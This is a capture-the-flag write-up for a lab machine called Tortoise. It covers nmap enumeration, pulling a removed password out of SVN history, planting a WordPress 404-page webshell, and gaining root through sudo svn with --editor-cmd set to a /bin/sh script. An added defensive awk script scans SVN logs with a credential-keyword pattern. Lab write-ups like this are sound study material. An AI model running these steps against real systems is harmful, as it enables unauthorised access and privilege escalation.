
Tortoise writeup (a target machine built by a group member)

nmap -p- 192.168.10.5
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-30 04:52 EST
Nmap scan report for tortoise.dsz (192.168.10.5)
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3690/tcp open  svn
MAC Address: 08:00:27:D5:23:F7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

After adding the domain name, port 80 turns out to be a WordPress site.

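The way in looks like the SVN service, but it needs a username and password, so I went through the blog posts. The post at http://tortoise.dsz/2026/01/23/a-comprehensive-guide-to-subversion-svn shows how the usernames and passwords are constructed. It gives harry:harryssecret, and the password of the other user, sally, follows the same pattern.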

svn list -R svn://192.168.10.5/ --username harry --password harryssecret
config.php
svn cat svn://192.168.10.5/config.php --username harry --password harryssecret                  
db_user=getenv('DB_USER');\ndb_pass=getenv('DB_PASS');

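Nothing useful there. Next I considered uploading a webshell, but that turned out not to be feasible. Then I looked at the log and found the admin password.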

┌──(kali㉿kali)-[~/Desktop]
└─$ svn log -v svn://192.168.10.5/ --username harry --password harryssecret       
------------------------------------------------------------------------
r2 | root | 2026-01-23 07:13:55 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:
   M /config.php

Remove hardcoded credentials for security
------------------------------------------------------------------------
r1 | root | 2026-01-23 07:13:54 -0500 (Fri, 23 Jan 2026) | 1 line
Changed paths:
   A /config.php

Initialize database config
------------------------------------------------------------------------                                                      
┌──(kali㉿kali)-[~/Desktop]
└─$ svn cat -r 1 svn://192.168.10.5/config.php --username harry --password harryssecret
db_user='admin'\ndb_pass='S3cret_P@ss_2026'
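
The r1/r2 history above shows that deleting a secret in a later commit does not remove it from the repository. As an added example (not part of the original post), the script below scans svn log --diff output for credential-looking literals and reports the ones a later revision removed but that remain readable with -r. The function names, the pattern and the sample log are assumptions constructed for illustration.

```shell
# Added example, not from the original post. Reads `svn log --diff` output
# (newest revision first) on stdin and reports credential-looking literals
# that any revision added, noting whether a later revision removed them.
scan_svn_history() {
  awk -v q="'" '
    BEGIN {  # secret-sounding name, then = or :, then a quoted literal
      pat = "(pass|secret|token|key)[a-z_]*[ \t]*[=:][ \t]*[\"" q "][^\"" q "]+[\"" q "]"
    }
    /^r[0-9]+ \| /   { rev = $1; next }              # revision header
    /^Index: /       { file = substr($0, 8); next }  # file the hunks belong to
    /^(\+\+\+|---) / { next }                        # diff file headers
    /^-/ && tolower($0) ~ pat {                      # removal, seen before the add
      removed[file SUBSEP substr($0, 2)] = rev; next
    }
    /^\+/ && tolower($0) ~ pat {
      line = substr($0, 2); state = "never removed"
      if ((file SUBSEP line) in removed)
        state = "removed in " removed[file SUBSEP line] ", still in history"
      printf "%s %s [%s]: %s\n", rev, file, state, line
    }'
}

# Constructed sample mirroring the r1/r2 history above; the secret is a placeholder.
sample_log() {
cat <<'EOF'
------------------------------------------------------------------------
r2 | root | 2026-01-23 | 1 line
Remove hardcoded credentials for security
Index: config.php
--- config.php  (revision 1)
+++ config.php  (revision 2)
@@ -1 +1 @@
-db_pass='EXAMPLE-not-a-real-secret'
+db_pass=getenv('DB_PASS');
------------------------------------------------------------------------
r1 | root | 2026-01-23 | 1 line
Initialize database config
Index: config.php
--- config.php  (nonexistent)
+++ config.php  (revision 1)
@@ -0,0 +1 @@
+db_pass='EXAMPLE-not-a-real-secret'
EOF
}

sample_log | scan_svn_history
```

Against a real repository the input would come from svn log --diff on the repository URL. Any hit means the credential has to be rotated, because every reader of the repository can still retrieve the old revision.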

Next comes WordPress: write a webshell into the 404 page and connect with AntSword.

In /var/www/localhost/.backup.php I found define('SECURE_KEY', '1006b3921'); I guessed it was the user's password, and it was.

It turns out that SVN can be used for privilege escalation.

                                         
Tortoise:~$ sudo -l
[sudo] password for onehang: 
Matching Defaults entries for onehang on Tortoise:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for onehang:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User onehang may run the following commands on Tortoise:
    (ALL : ALL) /usr/bin/svn
Tortoise:~$ cd /tmp
Tortoise:/tmp$ vim exploit.sh 
Tortoise:/tmp$ cat exploit.sh 
#!/bin/sh
/bin/sh
Tortoise:/tmp$ chmod +x exploit.sh 
Tortoise:/tmp$ sudo /usr/bin/svn commit --editor-cmd /tmp/exploit.sh
/tmp # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/tmp # cat /root/root.txt
flag{root-0b09d631dfda5e9d87a422fc17c1e286}
posted @ 2026-02-01 17:44  场-room